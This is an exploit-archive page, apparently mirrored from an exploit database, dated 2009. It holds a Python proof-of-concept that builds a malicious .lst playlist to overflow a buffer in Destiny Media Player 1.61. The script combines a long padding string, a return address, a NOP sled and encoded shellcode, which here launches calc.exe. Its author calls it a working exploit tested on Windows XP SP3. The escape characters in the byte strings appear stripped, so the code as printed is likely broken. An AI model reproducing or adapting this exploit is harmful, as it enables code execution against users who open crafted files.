[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Destiny Media Player 1.61 (lst File) Local Buffer Overflow Exploit
# Published : 2009-01-04
# Author : Encrypt3d.M!nd
# Previous Title : VUPlayer 2.49 (.wax File) Local Buffer Overflow Exploit
# Next Title : Destiny Media Player 1.61 (lst File) Local Buffer Overflow Exploit #2


# Destiny Media Player 1.61 (lst File) Local Buffer overflow Exploit
# By:Encrypt3d.M!nd
#
# i was so stupid when i wrote the poc coz i didn't realize somethings :p
# well this is workin exploit tested on windows xp sp3
# don't double click the file,import it from the program
#
# Greetz:-=Mizo=-(thnx dude :X),L!0N,El Mariachi,MiNi SpIder,all my friends
#

chars = "A" * 2052

# win32_exec -  EXITFUNC=seh CMD=calc.exe Size=164
Encoder=PexFnstenvSub http://metasploit.com

shellcode = (
"x33xc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73x13x13"
"x88x79x7bx83xebxfcxe2xf4xefx60x3dx7bx13x88xf2x3e"
"x2fx03x05x7ex6bx89x96xf0x5cx90xf2x24x33x89x92x32"
"x98xbcxf2x7axfdxb9xb9xe2xbfx0cxb9x0fx14x49xb3x76"
"x12x4ax92x8fx28xdcx5dx7fx66x6dxf2x24x37x89x92x1d"
"x98x84x32xf0x4cx94x78x90x98x94xf2x7axf8x01x25x5f"
"x17x4bx48xbbx77x03x39x4bx96x48x01x77x98xc8x75xf0"
"x63x94xd4xf0x7bx80x92x72x98x08xc9x7bx13x88xf2x13"
"x2fxd7x48x8dx73xdexf0x83x90x48x02x2bx7bx78xf3x7f"
"x4cxe0xe1x85x99x86x2ex84xf4xebx18x17x70xa6x1cx03"
"x76x88x79x7b")

file=open('exp.lst','w')
file.write(chars+"xD0x69x83x7c"+"x90"*15+shellcode)
file.close()

# www.Syue.com [2009-01-04]